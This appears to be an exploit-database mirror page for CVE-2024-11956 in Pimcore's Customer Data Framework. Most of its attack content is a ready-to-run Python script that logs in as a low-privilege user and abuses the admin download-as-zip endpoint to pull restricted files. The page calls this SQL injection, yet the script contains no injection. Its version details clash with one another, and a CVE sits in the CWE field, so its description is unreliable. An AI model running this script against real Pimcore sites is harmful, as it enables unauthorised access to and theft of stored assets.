header-logo
Suggest Exploit
vendor:
Pimcore Customer Data Framework
by:
maeitsec
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Pimcore Customer Data Framework
Affected Version From: 4.2.2000
Affected Version To: 10.5.20
Patch Exists: NO
Related CWE: CVE-2024-11956
CPE: pimcore:pimcore
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 20.04
2025

Pimcore Customer Data Framework 4.2.0 – SQL Injection

The Pimcore Customer Data Framework version 4.2.0 is vulnerable to SQL injection. An attacker can exploit this by manipulating the input fields to inject SQL queries, potentially gaining unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, sanitize and validate user inputs to prevent SQL injection attacks. Update to Pimcore version 10.5.21 or later where the issue is fixed.
Source

Exploit-DB raw data:

# Exploit Title: Pimcore customer-data-framework 4.2.0 -  SQL injection
# Date: 01/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore versions prior to 10.5.21
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
# CVE: CVE-2024-11956

import requests

# Replace with target URL and credentials
TARGET_URL = "http://example.com/pimcore"
USERNAME = "low_privilege_user"
PASSWORD = "password123"

# Authenticate and get session
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)

if "Login successful" in login_response.text:
    print("[+] Authenticated successfully.")

    # Exploit the downloadAsZip functionality
    download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
    payload = {
        "ids[]": ["1", "2", "3"]  # Replace with IDs of restricted files/folders
    }
    download_response = session.post(download_url, data=payload)

    if download_response.status_code == 200:
        print("[+] Exploit successful. Restricted files downloaded.")
        with open("restricted_files.zip", "wb") as f:
            f.write(download_response.content)
    else:
        print("[-] Exploit failed. Server returned:", download_response.status_code)
else:
    print("[-] Authentication failed.")

Navigation

Suggest Exploit

Services By CQR